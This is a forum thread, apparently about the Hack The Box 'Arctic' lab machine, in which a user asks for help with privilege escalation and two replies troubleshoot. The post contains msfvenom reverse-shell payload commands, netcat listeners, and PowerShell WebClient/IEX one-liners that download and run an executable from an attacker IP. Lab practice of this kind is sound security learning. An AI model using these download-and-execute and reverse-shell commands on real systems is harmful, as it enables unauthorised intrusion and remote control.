Arctic

Having privesc issues with this box.

Tried following an IppSec video and the official write-up.

Please, I would like a non-meterpreter solution.

Basically so far I’m able to get the user shell pretty easily with

searchsploit coldfusion
Adobe ColdFusion Server 8.0.1 - ‘administrator/logviewer/searchlog.cfm?startRow’ Cross-Site Scripting | exploits/cfm/webapps/33168.txt

// I browse to the payload and activate it.

nc -lvnp 4444

// I now have user shell tolis and get user.txt

// Next I build my payload

msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.14.3 LPORT=5432 -f exe > exploit2.exe

nc -lvnp 5432

// I set up my web server in the directory I am working this box.

python -m SimpleHTTPServer
Serving HTTP on 0.0.0.0 port 8000 …

// It is listening on port 8000.

// I name my msfvenom payload as exploit2.exe and make sure that it is in my web server.

// I run the next command in my windows user shell and it doesn’t work. No status updates in my web server terminal.

powershell “(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)"
powershell (new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)

// try IEX

powershell “IEX(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)”
powershell IEX(new-object System.Net.WebClient).Downloadfile(‘http://10.10.14.3:8000/exploit2.exe’,‘exploit2.exe’)

// Try these

powershell “IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit2.exe’)”
powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit2.exe’)

// This last one is the only one that got a response in my mini web server. Despite IppSec and the official writeup’s instructions. For some reason the double quotes are giving the shell bad characters (diamond with a question mark) and seems to not like the command.

// Now my issue is that the payload does not seem to execute. my nc 5432 listener returns nothing

// Trying a different payload.

msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.3 LPORT=5432 -f exe > exploit3.exe

// Tried these

powershell IEX(New-Object Net.WebClient).downloadString(‘http://10.10.14.3:8000/exploit3.exe’)

//Still nothing. Any thoughts?

does it actually download the file, or is it trying to automatically execute? I think this method only works if the requested file contains a powershell exploit. I’m having a pig of a time getting an exploit onto the box, ftp with a config file isn’t working, can’t get powershell to work, and the write up saying to change the timers in metasploit doesn’t appear to work either - feels like i’m missing something major

never could get that to work - i think the FTP issue is related to not being able to switch to passive - a common VBS script works